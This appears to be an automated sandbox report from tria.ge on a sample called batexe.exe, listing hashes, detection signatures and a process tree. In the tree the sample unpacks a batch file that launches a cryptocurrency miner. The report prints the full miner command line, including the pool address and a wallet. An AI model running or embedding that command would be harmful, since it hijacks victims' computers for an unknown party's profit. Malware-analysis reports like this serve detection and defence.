Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
295s -
max time network
306s -
platform
windows10-1703_x64 -
resource
win10-20231215-ja -
resource tags
arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows -
submitted
11/02/2024, 12:29
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20231215-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 648 b2e.exe 3304 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 3304 cpuminer-sse2.exe 3304 cpuminer-sse2.exe 3304 cpuminer-sse2.exe 3304 cpuminer-sse2.exe 3304 cpuminer-sse2.exe -
resource yara_rule behavioral1/memory/520-5-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 520 wrote to memory of 648 520 batexe.exe 74 PID 520 wrote to memory of 648 520 batexe.exe 74 PID 520 wrote to memory of 648 520 batexe.exe 74 PID 648 wrote to memory of 4860 648 b2e.exe 75 PID 648 wrote to memory of 4860 648 b2e.exe 75 PID 648 wrote to memory of 4860 648 b2e.exe 75 PID 4860 wrote to memory of 3304 4860 cmd.exe 78 PID 4860 wrote to memory of 3304 4860 cmd.exe 78
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:520 -
C:\Users\Admin\AppData\Local\Temp\12D7.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\12D7.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\12D7.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:648 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1AA7.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:4860 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3304
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.2MB
MD535d614acc52ac1f063676559357ef3a0
SHA138bb0f406b81b4c032d7958594010287638ecd96
SHA256397dbf36993a3df62c00ff4c243d4fa121db1cedc849f2463fde7f4b6b8005d0
SHA5120c20d72bef049a19448ff7864f4f57a113dcbaff81dad6c45b4073cddfb9e719f5053242d98d312263a7bec791a002f26c62a24b83fc755a5ee1f47a7f8427fb
-
Filesize
2.3MB
MD595d0895d47c630fe64aec4efc6503ff1
SHA142d51bf0d6d09b4102fc60448ff483bcd264a897
SHA256c998279cbf40944a56e0e6f69f5c92f4aa319880ec14dccfdf6c5b76de5ccb0b
SHA512b7f633d7396a0386e6f6f04602982a66305d3c9ec97e4e8aba616728d15ad91984f1107bf3b1f65e9cb41c9a3d835538c53239fead4bb06bb5253ad36f45ed01
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
762KB
MD53e70e1a00d8117011a919a6c5a231787
SHA1dfd5fe9d6b1c798b5384310ae4523fdc6bfdbb2d
SHA256e033d3196cc647e764956749aa299d458825029f24c1d9e478ab0e03ce86ef14
SHA5121c72ef6f75e266c315cfa2a538c26c94795757b6af7ec991c327ff643a719753cf3f5417c8440be13139336d4f2209d332afe52e10406ac0a58124d1aab53401
-
Filesize
1.2MB
MD5ab883d8c26f9a5ebbe45d5be4e2896b4
SHA155b83d7b58866db48f6e6caedec16aa8c2849a12
SHA2566344788b16d68c729821b0934505d0b9bdc4c7b21dc2a57b9b764d01200469ca
SHA5126571fe74ad601078121502efc23a2fa4175056ac0e52ef3deb3a851db3ca31a236cfe060830a0a4ecb2bfbca04ed7eddb04f7d4060f7db72e81a2b901afbb5ef
-
Filesize
1.0MB
MD5715d6847edf90755983295df67635193
SHA12d95fade0cd604195c057057c8aa4ad91bc0c486
SHA256ce8bbb2e9f0991688e93b66e5e4fe69aadd9e1782671178248bae031d99876e7
SHA5120b2d77adf46cf456ed4192177e2e00fdaa3a0a9d10e5a75c71cd11b3fe11e7a9932d03d9f8b6ed116323a838af01ab80f436a6878ca6f11716a494526d4bfce7
-
Filesize
314KB
MD5708ba341c1a9185c9eb26c2ade842964
SHA1c697d45513a642940a7bb109bc682e5ec55b72ab
SHA256a0eb044e3be3b36cb1dfa13a100ebf7aa83b152a20fe807356e5c3f592f4c982
SHA5125af1aa1b583c4b3113c04245a5f5d813ae0417d4cab06d70a570518f14b65776c3af23e33efce1d9d5b509af2fdd42112b29505d299dbb443fe0c56cfafcd002
-
Filesize
575KB
MD55a0fe35da6ddbe21ff99d857d86ad697
SHA1d19d524f9ad86442a96462b49adac5a13077c05a
SHA25623bd97f62d12fcf3aa205492b711b3b565d12b13786130eedd2145d94a55c018
SHA51207f8465c67d81b645985c80e7c8dca135943c80ba4fcc5cc907515c020cf82ec254a10c954b2cd4060eb2558b64852b6e28836052d6a7805bb280e3a25a23b2f
-
Filesize
568KB
MD5d7f3eb63f5a9151492c59a9c5124aa8b
SHA13dd58f0b302a4ecdedf5845751a6cf6db635a3f1
SHA256f2f16c407d63a0ee18f4cc805507d1ddcd7aba8c15c31a1a494c9d8aa2e2666e
SHA51278fdd9850b662ab593d5a88879fb31ee5f68e8b402cf1bbc8fcc6d5f8ae6d98e578e195870331396762b56d5aec8022a916e962c06063404381938129c2300ef
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770